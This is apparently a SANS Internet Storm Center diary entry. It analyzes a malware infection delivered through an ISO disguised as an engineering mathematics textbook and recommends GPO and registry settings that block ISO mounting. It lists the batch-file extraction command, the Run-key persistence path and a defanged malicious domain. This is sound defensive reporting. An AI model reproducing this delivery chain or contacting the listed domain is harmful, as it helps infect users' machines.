C:\Users\user\Downloads\Stroud - Advanced Engineering Mathematics 4e.iso 

 

This ISO file contained the following files

files.zip

res.ico

Install.lnk

properties.bat

 

The user double clicked on the Properties.bat file that started the infection process.

Parent Process Name: cmd.exe

Parent Process Command Line: cmd.exe /c ""D:\properties.bat" "

Process Name: tar.exe

Process Command Line arguments: tar -xvf "files.zip" -C "C:\Users\user\AppData\Roaming"

They established persistence with CurrentVersion\Run key.

"opensubtitles-uploader.exe "k2eN"" /f. 

HKEY_CURRENT_USER\S-1-5-21-740110469-27406-3214746-20027\SOFTWARE\Microsoft\Windows\CurrentVersion\

C:\Users\user\AppData\Roaming\opensubtitles-uploader\opensubtitles-uploader.exe.

Connection to some malicious domains from happened from opensubtitles-uploader.exe.

C:\Users\user\AppData\Roaming\opensubtitles-uploader\opensubtitles-uploader.exe.

https://alizebruisiacult[.]xyz

https://raw.githubusercontent[.]com

 

Since the infection is coming from a user mounting and executing files in an ISO, the best way to stop this is to prevent a user from mounting the ISO by double clicking. Users are still able to Burn a CD from within windows if needed. If you have power users that need to open ISOs they can use compression utilities.  

 

Mubix (Rob Fuller) has a great article about how to disable this.(1).  Below, there are two different options to prevent users from double clicking ISO file to mount them.  The GPO method is a little more complete in protections, see the article for more details. We have deployed this in my environment to end users' desktops and have not had any issues to this point nor any new infections via this method.

 

GPO 

Computer config -> Admin Templates -> System -> Device Installation Restrictions ->  

  • Allow administrators to override Device Installation Restrictions Policies (enabled) 
  • Prevent Installation from devices that match any of these device IDs 

 Add this exact ID    

  • SCSI\CdRomMsft____Virtual_DVD-ROM_ 

 

Registry Setting 

  • HKEY_CLASSES_ROOT\Windows.IsoFile\shell\mount 
  • Value “ProgrammaticAccessOnly” as REG_SZ 
     

(1) https://malicious.link/post/2022/blocking-iso-mounting/ 


If you have done this or something similar, let us know. 

--

Tom Webb

@twsecblog

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.